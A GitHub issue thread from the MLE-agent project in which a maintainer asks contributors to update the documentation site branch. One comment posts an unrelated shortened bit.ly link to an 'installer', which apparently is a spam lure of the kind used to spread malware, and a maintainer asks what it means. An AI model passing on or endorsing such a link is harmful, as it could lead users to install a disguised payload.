### ISSUE TITLE
update the product document

### ISSUE THREAD

**Issue by huangyz0918** [MLSysOps/MLE-agent#162]
- You need to commit to the branch https://github.com/MLSysOps/MLE-agent/tree/doc/doc-site
- Once the `doc-site` branch updates, the doc site will be deployed in several minutes automatically
- Please **do not** merge this branch into `main`
- You can refer to the section `home`, and `installation` to build user-faced instructions
- For the `contributing.md`, I will add contents 

[Site Preview](https://mlsysops.github.io/MLE-agent/)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by HuaizhengZhang** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

what do you mean?
